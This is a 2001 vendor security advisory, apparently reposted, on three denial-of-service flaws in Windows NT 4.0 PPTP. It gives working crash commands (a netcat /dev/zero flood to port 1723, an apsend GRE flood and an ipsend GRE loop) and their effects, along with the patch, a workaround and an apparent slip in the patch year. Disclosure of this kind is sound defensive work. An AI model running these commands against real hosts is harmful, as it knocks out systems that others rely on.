[ SOURCE: http://www.secureroot.com/security/advisories/9876756313.html ]

Diversified Software Industries, Inc.

http://www.dsi-inc.net/dsi

Security Advisory



February 22, 2001



Denial of Service attack against computers running Microsoft PPTP (NT 4.0)



1. Description

2. Steps to reproduce (exploits)

3. Vendor status, solution, workarounds

4. Disclaimer

5. Credits

6. About DSI



----------------------------------------

1. Description



PPTP (Point-to-Point Tunneling Protocol) is a networking technology that is

used to create VPNs.  The protocol uses TCP (port 1723) and GRE to perform

its work.  PPTP is specified in RFC 2637 (see

http://www.ietf.org/rfc/rfc2637.txt )



This advisory presents three separate vulnerabilities.  All three

vulnerabilities affect Windows NT 4.0 Workstation and Server computers

configured to accept incoming PPTP connections.  The first vulnerability

involves malformed TCP packets; this vulnerability only affects certain

hardware, and only affects systems pre-SP6.  The second and third

vulnerabilities involve malformed GRE packets; these affect computers with

any Service Pack.



Note that Microsoft's original bulletin did not list NT 4.0 Workstation as

vulnerable.  However, if configured to accept incoming PPTP connections, NT

Workstation is vulnerable.  No versions of Windows 2000 are believed

vulnerable.



----------------------------------------

2. Steps to reproduce (exploits)



Tools needed:

Unix box (e.g., Linux, *BSD)

netcat ( http://www.l0pht.com/~weld/netcat/ or

http://www.securityfocus.com/tools/137 )

apsend ( http://www.elxsi.de/ or http://www.securityfocus.com/tools/976 )

ipsend ( http://coombs.anu.edu.au/%7Eavalon/ or

http://www.securityfocus.com/tools/129 )



Vulnerability 1:  TCP Port 1723



This vulnerability only applies to machines prior to SP6.  Not all machines

are affected; it appears there may be some BIOS or other issue at work here.

To reproduce, enter the following on the Unix box:



nc <ip address> 1723 < /dev/zero



If vulnerable, the target host will blue screen in a few seconds with an

error such as:

STOP 0x0A (0x0, 0x2, 0x0, 0x0)

IRQL_NOT_LESS_OR_EQUAL



Again, this vulnerability is machine-dependant; a list of tested hardware

and results can be found in the online version of this advisory at

http://www.dsi-inc.net/dsi/pptp_security_report.html



Vulnerability 2:  GRE



This vulnerability applies to all service packs.  To reproduce, on the

target machine, open task manager and select the performance tab.  Also,

open a DOS window (Start: Run: cmd).  On the Unix box:



apsend -d <ip address> --protocol 47 -m 0 -q



On the target host, you will see the numbers for kernel memory slowly rise

in task manager.  Eventually, these numbers will stop increasing; at this

point, CPU may hit 100% for some period of time.  Now try issuing a command

such as DIR at the command prompt; you'll see a message indicating the OS

isn't able to complete the command.  Also, you may find the following in

your System event log:



Event ID: 2000 "The server's call to a system service failed unexpectedly."

and/or

Event ID: 2019 "The server was unable to allocate from the system nonpaged

pool because the pool was empty."



Eventually, the target host may reboot/blue screen, or it may simply remain

in an unusable state.  As noted by Microsoft in their description of the

issue, a large number of packets is required.  For a server with 64 MB RAM

installed, something on the order of 350,000 to 400,000 packets is needed.

Note that the effect is cumulative; e.g., an attacker could send 200,000

packets at 10 A.M. and 200,000 at 2 P.M.



Vulnerability 3:  GRE



This vulnerability also applies to all service packs.  To reproduce, on the

Unix box:



#!/bin/csh

foo:

        ipsend -i <interface> -P gre <ip address> > /dev/null

goto foo



The target host will blue screen quickly.  Approximately 50 packets are

required.



----------------------------------------

3. Vendor status, solution, workaround



Microsoft has released a patch on February 13, 2000. Microsoft's bulletin is

available at http://www.microsoft.com/technet/security/bulletin/MS01-009.asp



As a workaround, it is possible to filter GRE by source address at your

perimeter.  However, since GRE is a connectionless protocol, source address

spoofing is trivial.  Thus, if an attacker can guess what source addresses

are allowed, filtering may not be effective.



----------------------------------------

4. Disclaimer



The information in this advisory is believed to be accurate.  No warranty is

given, express or implied.  Neither the author nor the publisher accepts any

liability whatsoever for any use of this information, nor do we condone the

use of this information for unethical purposes.



----------------------------------------

5. Credits



Microsoft, for their efforts to fix this problem

Chris Manjoine of the University of Iowa, for his help testing the exploits

Hobbit, Anarchy, and Darren Reed, for their useful tools



----------------------------------------

6. About DSI



Diversified Software Industries, Inc. is an Iowa City/Coralville, Iowa-based

company that develops and markets software for the graphical representation

of data in vehicles. In addition, DSI markets custom software development

and project management skills to firms in the over-the-road transportation

marketplace. These custom solutions provide back office and on-vehicle

wireless messaging management, as well as dispatching and resource tracking

systems.



You can find more information about DSI at http://www.dsi-inc.net/dsi